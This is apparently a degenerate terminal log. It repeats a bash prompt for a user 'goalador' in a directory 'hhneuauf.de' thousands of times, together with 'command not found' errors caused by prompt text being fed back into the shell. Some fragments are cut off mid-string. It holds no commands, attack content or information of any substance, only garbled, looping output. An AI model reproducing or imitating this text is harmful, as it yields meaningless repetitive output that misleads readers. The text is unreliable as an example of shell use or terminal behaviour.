found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +lador@gatanda hhneuauf.bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +.de]$ bash: bash:: command not bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ nda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ nda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found 